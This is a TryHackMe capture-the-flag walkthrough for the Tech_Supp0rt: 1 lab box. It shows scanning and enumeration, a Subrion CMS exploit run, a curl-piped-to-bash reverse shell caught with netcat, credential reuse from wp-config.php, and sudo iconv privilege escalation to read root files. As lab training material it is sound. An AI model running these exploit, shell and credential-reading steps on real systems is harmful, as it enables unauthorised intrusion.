Hello, Tech_Supp0rt: 1? I Think I Have a Problem with My CMS: TryHackMe Walkthrough
In this walkthrough, we explore the Tech_Supp0rt: 1 CTF on TryHackMe, covering steps such as using Nmap for scanning, Gobuster for directory enumeration, enum4linux for SMB share discovery, exploiting a Subrion panel, and escalating privileges to root. The process involves identifying open ports, finding directories and shares, cracking credentials, exploiting a vulnerable CMS, and ultimately gaining root access to the system.
Step 1: Nmap
nmap -T4 -sV -sC -A -p- 10.10.185.192 --min-rate 1000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=7/12%OT=22%CT=1%CU=36267%PV=Y%DS=4%DC=T%G=Y%TM=64AEDF5
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=109%GCD=2%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS(O1=M509ST11NW7%O2=M509ST11
OS:NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=68D
OS:F%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M50
OS:9NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RI
OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 4 hops
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: techsupport
| NetBIOS computer name: TECHSUPPORT\x00
| Domain name: \x00
| FQDN: techsupport
|_ System time: 2023-07-12T22:43:56+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-07-12T17:13:54
|_ start_date: N/A
|_clock-skew: mean: -1h49m57s, deviation: 3h10m29s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Step 2: Gobuster
gobuster dir --url http://10.10.185.192/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -q
Step 3: enum4linux
Let's run a scan to see which shares are available.
enum4linux 10.10.185.192
Step 4: SMB Share
smbclient //10.10.185.192/websvr
Let's see what is in this text file.
Hmmm. Let's see if we can crack this with CyberChef.
Step 5: Subrion Panel
Let's enumerate for a Subrion panel using gobuster.
gobuster dir --url http://10.10.185.192/subrion/ -f -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o subrion.txt -b 301,302,304 -t 100 -q
We discovered an admin panel. Let's plugin the credentials we gathered from our earlier recon.
It looks like the CMS version is 4.2.1. Searchsploit has an exploit for this.
Download by typing:
searchsploit -m php/webapps/49876.py
Step 6: Exploit
Exploit:
python3 49876.py -u http://10.10.185.192/subrion/panel/ --user=admin --passw=********
Nice! Now, let's get a better stable shell on here. First, let's start a Python server where our reverse shell is located:
python3 -m http.server 8000
Then start a netcat listener to catch the shell:
rlwrap nc -lvnp 1337
Finally, pull the script onto the victim box:
curl http://10.10.185.192:8000/shell.sh | bash
Let's upgrade it:
python -c 'import;pty.spawn("/bin/sh")'
export TERM=xterm-256color
Step 7: Privesc and Root
First, let's check crontab:
cat /etc/crontab
No attack vector here, let's check the binaries:
find / -type f -perm -04000 -ls 2>/dev/null
Nothing here either, let's dig around the file system for something useful.
/var/www/html/wordpress/wp-config.php
has a password that we can use to pivot.
Let's check /etc/passwd
for usernames.
We can take the password we found from the wp-config.php and log in to scamsite
.
And we're in. Let's see what we can run as sudo.
We can run /usr/bin/iconv
as sudo. Let's check GTFObins for a privesc method.
LFILE=/root/root.txt
sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE"
From here we could use this binary to read the /etc/shadow
file and elevate permissions or create ways to maintain persistence. Overall, this box was very enjoyable and I'm glad there was a unique vector in order to gain root-level privileges.